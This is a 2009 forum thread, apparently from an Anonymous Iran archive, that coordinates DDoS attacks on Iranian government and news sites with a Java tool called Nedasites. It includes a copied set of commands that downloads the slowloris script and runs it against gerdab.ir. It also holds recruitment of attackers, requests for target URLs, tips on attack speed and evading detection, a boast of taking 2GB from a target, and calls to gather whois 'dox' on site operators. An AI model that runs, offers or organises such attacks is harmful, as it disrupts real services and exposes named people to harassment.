Customize

Help for DDoS: Nedasites

Discussion in 'Anonymous Iran Archive' started by gr88iran, Jun 30, 2009.

?

How do you like this program?

Excellent 12 vote(s) 50.0%
Good 3 vote(s) 12.5%
Haven't tried it yet 6 vote(s) 25.0%
Rubbish 3 vote(s) 12.5%
  1. gr88iran Member

  2. How?

    Just a question : is this a DDoS attack or a syn flood similar to slowloris? DDoS is not adviced, as it can easily make it very difficult for bloggers to get through.
  3. gr88iran Member

    Yeah it's a DDoS but just some sites are hosted in Iran therefore it will not reduce the bandwidth of the country. (URLs ‎(Nedasites)‎)

    You can check a host's location (not the Domain name): My IP Address Location: Find IP Address Search - IP Lookup Locator

    The only website from inside Iran that we try to DDoS is gerdab.ir which is the spy site of Cyber-crime police. However, they have published images of protectors and ask ppl for identification: A few words to Gerdab ppl ‎(Nedasites)‎
  4. It doesn't work on osx 10.5.6

    I get these error in the console:

    .com.apple.JarLauncher[340]: Exception in thread "main"
    [0x0-0x26026].com.apple.JarLauncher[340]: java.lang.NoClassDefFoundError: javax/swing/GroupLayout$Group
    [0x0-0x2a02a].com.apple.JarLauncher[347]: Exception in thread "main"
    [0x0-0x2a02a].com.apple.JarLauncher[347]: java.lang.NoClassDefFoundError: javax/swing/GroupLayout$Group

    for the moment I'm using slowloris:

    "
    To run slowloris.pl on Mac OS X, open Terminal and type this (hit return at the end of each line):

    mkdir -p ~/Source && cd ~/Source/
    curl -O http://ha.ckers.org/slowloris/slowloris.pl
    chmod +x slowloris.pl
    ./slowloris.pl --dns www.gerdab.ir
    "
  5. Srpska Member

    I like the general idea, and when I get some time I'll give it a whirl - but personally I am uneasy about DDoSing even a few primary targets, because the Iranian internet is so very, very flimsy.
  6. gr88iran Member

    Thanks for your interest :) But just some sites are hosted in Iran therefore it will not reduce the bandwidth of the country. (URLs ‎(Nedasites)‎)

    You can check a host's location (not the Domain name): My IP Address Location: Find IP Address Search - IP Lookup Locator

    The only website from inside Iran that we try to DDoS is gerdab.ir which is the spy site of Cyber-crime police. However, they have published images of protectors and ask ppl for identification: A few words to Gerdab ppl ‎(Nedasites)‎
  7. gr88iran Member

    Sorry but the error that you have mentioned belongs to slowloris. :)
    Nedasites runs on many platforms including Linux and Apple Mac OS X. You can download it here: Home ‎(Nedasites)‎

    Don't hesitate to ask any question about it here :)
  8. Yes, sorry I got confused with the error messages. The one I get from nedasites in the console is:

    [0x0-0x38038].com.apple.JarLauncher[436] Exception in thread "main" java.lang.NoClassDefFoundError: javax/swing/GroupLayout$Group

    And a pop up says "Can't launch jar file"
  9. gr88iran Member

    Here is a couple of suggestions:
    1. Please get the latest version from the Home page of the site.
    2. Be sure to uncompress the zip file somewhere. Running the Jar file directly from inside the zip archive doesn't work.
    3. If you have a PC, please check the java.com and make sure that you have the latest version of Java. If you want to run it on Mac, please take a look at this: Mac OS X: Updating your software

    If it didn't solve the problem, don't hesitate to inform us!
    Thanks for your interest to support Iranians.
  10. I got it to work, had to right click the compressed nedasites file and choose run with java script. The urls did not load i had to manually add them. otherwise looks like a good program except that gerdab.ir blocks ips that hit them frequently therefore this may not work on gerdab.ir for long.
  11. gr88iran Member

    Thanks for mentioning the workaround.
    Yeah I guess they'll ban the IPs that frequently send request. After all, they are "cyber security" police! But the good news is that we received more than 2GB of information from their web site in the first few days of developing this application and they even couldn't trace us! :D But some day they will identify us and may try to arrest via Interpol! hahahaha (of course if Interpol doesn't arrest them for war crime!) :p
    • Like Like x 1
  12. Hi, thanks for helping.

    I downloaded the latest, installed java 4 from the system updates. But I still get the same error:

    "java Nedasites.jar
    Exception in thread "main" java.lang.NoClassDefFoundError: Nedasites/jar
    "

    any other osx users out there had sucess ?
  13. gr88iran Member

    Another user has reported this solution. Please tell us the result:
  14. Yah, Gerdab's blocking of IPs seems to be something they developed in response to Ddos'ing. The result is that any IP that does Ddos will eventually just receive time out messages. This takes hours at this point, not days. This is not a civy corp site, it is a site run by hackers, who just happen to want to kill all apostates. I mean, they named the site "Black hole" for god's sake.

    Now, since the Slowloris seems the best solution for stuff inside Iran, and since some sites like the presidential site have so much bandwidth as to almost be immune to Ddos, Slowloris seems the answer on those, aside from the hackers actually going inside gerdab and other sites and fucking them up.

    As for the ones outside Iran, it seems that calling hosts and saying, "Hey, you're currently hosting photos from the IRG, registered by your government as a terrorist group, and these photos are being put up in order to identify people so they can be killed." it would be more effective, especially as they can then initiate scans for those photos in the future and keep them from coming back?

    What we need are ID lists of sites with whois info already in the list so any noob who sees it on twitter can come to the forum and start phones ringing off the hooks.
  15. I grant you it's boring. However, effective has its merits.
  16. gr88iran Member

    Well we did the best we could...
    It's boring. It wastes our bandwidth. It took so long to create and debug the application... But it's better than nothing. We did our best to stand shoulder by shoulder with out sisters and brothers who give their blood. We just wanna shut up the liars who insult these bloods.
  17. gr88iran Member

    Damn :( That's why I wrote an open letter to them: A few words to Gerdab ppl ‎(Nedasites)‎
    But I'm afraid then even can't read English.

    OK, I'll study about DDoS Syn attack and see if we can change the program to be more effective.

    Perfect! That's a great suggestion. Another task is to Whois the domain names and register the name of all individual for identification after we win the revolution.
    UPDATE: ppl are signing this petition:
    To: ICANN, OnlineNIC
    We ask OnlineNic and other ICANN providers to suspend "rajanews.com" and "farsnews.com" and above all "ansarnews.com" due to the fact that these websites support terrorists who are responsible for recent suppression and murder of Iranian people.
    http://www.petitiononline.com/irvote88/

    Yes, true.
    We may add it to the program. It's easy. But since it's a big change, takes some time.
  18. Thank you for making this program. Slowloris is apparently ineffective if you're running it under Windows, so this easy piece of software is a perfect replacement (for sites hosted outside of Iran)
  19. Srpska Member

    Yes. There are some hosted in the Great Satan and Canuckistan, I believe, so if someone could whois them and post the dox here that would be thimply thuper.

    The thought of Western - let alone American - bandwidth helping brutes and murderers track down their victims makes my blood boil. And no I'm-so-clever remarks about GPS in Afghanistan, thank you very much.
  20. gr88iran Member

    Thanks for your motivation :) We do our best to have a great software. I personally feel very responsible for the blood that our brothers and sisters are devoting to freedom. My father wasn't strong enough, so he left the country. But maybe one day I'll return to Iran and live with my people :)

    Our team is working to add the GeoIP feature that is when you add a website, it will tell the location of its host. But it takes some time. Today we added the speed-graph feature with took 5 hours alone!
    Here is the download map. Almost all the people around the world are helping us! So far we had 342 downloads in the following regions:
    izm5us.jpg
    The legend in the left bottom corner is removed for security reasons, but basically the stronger color means more downloads (and probably more helpers).
  21. Srpska Member

    That's an interesting map. It suggests something rather promising about China, for a start.

    Also, why isn't Britain pulling its weight? And I mean that not as a harangue, but as a serious question. Do we need more propaganda directed at Brits or something?
  22. Srpska Member

    Nedasites seems to be having difficulty with the "https://" prefix. I tried to point it at https://smsmonitoring.itrc.ac.ir (which is something to do with the Iranian Govt's monitoring of text messages) and although I deleted the presupplied "http://" from the window to enter a URL before pasting the link in, when I submitted it it came up with

    "https://smsmonitoring.itrc.ac.ir http://"

    in the main window, which understandably didn't do anything.

    Shame really, because up till that point I was pretty pleased with it. Is there anything you can do?
  23. gr88iran Member

    Yeah! It's kind of interesting that China and Poland are helping as much as America. I mean there are lots of Iranians in America, but not so much in China or Poland. Except if we interpret it that Chinese and Polish hackers are helping us.

    Thanks for your feedback. I can add https://smsmonitoring.itrc.ac.ir with no problem. But the point is that it uses a malicious certificate (self-signed) and needs username/password to let me in. Are you sure that it's a valid target?
    By the way, we need to attack all at once so if there's any other URL that you're sure that it should be attacked, don't hesitate to mention it here.
    We also have a URL guide that lists the most targeted URLs.

    I should update that list with Country/Purpose info.
  24. Running Nedasite on OS X MAC!!!!

    NedaSite requires Java 6, but java 6 is not the default one in OS X. To set it as your default you need to run the Java Preferences application it is under
    Open -> Applications -> Utilities -> Java -> Java Preferences

    Or just simply look for it in spot light.

    Once you have chosen Java 6 as your default java then you can start nedasite. Happy attacking.
  25. Does that mean China is helping us, or just monitoring this site really heavily?
  26. My money is on helping. The British are waking up to the diplomats-in-peril news, so expect to see more.
  27. gr88iran Member

    The map shows the density of downloads from our site: Home ‎(Nedasites)‎

    we are also thinking about some security barriers so that people from inside iran don't run into trouble if they mistakenly run this application despite of the warning in when they run the app for the first time.
  28. gr88iran Member

    Thanks Mac Nerd :) I'll update the site and put these information online. Some ppl report that you should right click the jar and choose "Run as JavaScript" what's that trick?
  29. gr88iran Member

    :) Thanks for your help dude!
    We need to stand against the blood suckers.

    One of the bases for any dictatorship is the media.
    And the Iranian regime is so much concerned about their face in the International community.
    Our task here is to shut off their websites :)
    So far so good!
  30. gr88iran Member

    This one is a bug and Mehran has fixed it. Please get the latest version online: Home ‎(Nedasites)‎

    Don't hesitate to inform us if you found any bug! :) Thanks!
  31. If the program isn't able to connect to some websites, is that a good sign (that the sites are down) or a bad sign (that the admins are blocking our connections somehow)?

    Keep up the good work. Anyone with an internet connection can and should run this program all day every day. Takes no processing power and little bandwidth, but can make a big impact
  32. gr88iran Member

    Yeah, you got it right. For security reasons I'll not reveal more information here (because they may find a counter attack knowing how our program works), but if you see that a website doesn't show much activity then it's time to remove it or add another website (we have a list of possible URLs here)
    In the URL list, after the URL there's a bracket. The first number is the number of successful HTTP connections to that site and the second number is the volume of data received so far.
    Putting a more meaningful message and automatic suspend/resume of attack is in our feature list, but first we have to put some extra security features to make it harder for the government agents to detect and stop the attack.
    Thanks for your support for the Iranian people. A new version is just released a few minutes ago. Basically not a technical upgrade, but it looks even nicer! ;)
  33. Really excellent work.

    Thank you.
  34. For anyone concerned about downloading this, it comes up completely clean on VirusTotal Online scan (using 41 AV engines) .

    To confirm, either download and check yourself, or go to VirusTotal - Hash Search and paste one of the following hashes in the search box.

    MD5: 25bc5507934756a836e574e9b43f8b3a
    SHA1: a451e408664b750913164195c656bc4845cc1ddb
  35. i think its a great idea, and i'm not very comp savy, so i was wondering if i need to take any precautions before running this ?
  36. i'm the same unreg as above. also if a site says sleepiong that's good yes? or is that when i need to change urls?
  37. gr88iran Member

    Precautions:
    1. NEVER run this program if you are INSIDE Iran.
    2. You should have a fast internet connection otherwise your attack will not be effective.
    3. If your Internet Service Provider (ISP) has traffic limitations (for example 10 GB/month) maybe you don't want to waste it for DDoS attacks. Contact your ISP for more information.

    This project is free and Open Source, but unfortunately we cannot release the source code to the public at this time because the Iranian government will develop a counter attack or release a malicious version of it. But if you are a Java Desktop developer familiar with Netbeans and Swing, please contact us. For the rest of the users, it's recommended to check the application with a virus checker to make sure.
  38. gr88iran Member

    "Sleeping" means that the application is not attacking a web site. It is the time distance between two consecutive attacks. The less sleep, the faster attack (and the more bandwidth, and the more CPU usage!) ;)
  39. gr88iran Member

  40. thanks for the quick reply, but i was thinking more along the lines of would usage be tracked back to my isp, or do i need a physical firewall( router) or is a software one ( zonealarm etc) ok or does it not matter?
    thanks again, and keep up the good work

Share This Page

Customize Theme Colors

Close

Choose a color via Color picker or click the predefined style names!

Primary Color :

Secondary Color :
Predefined Skins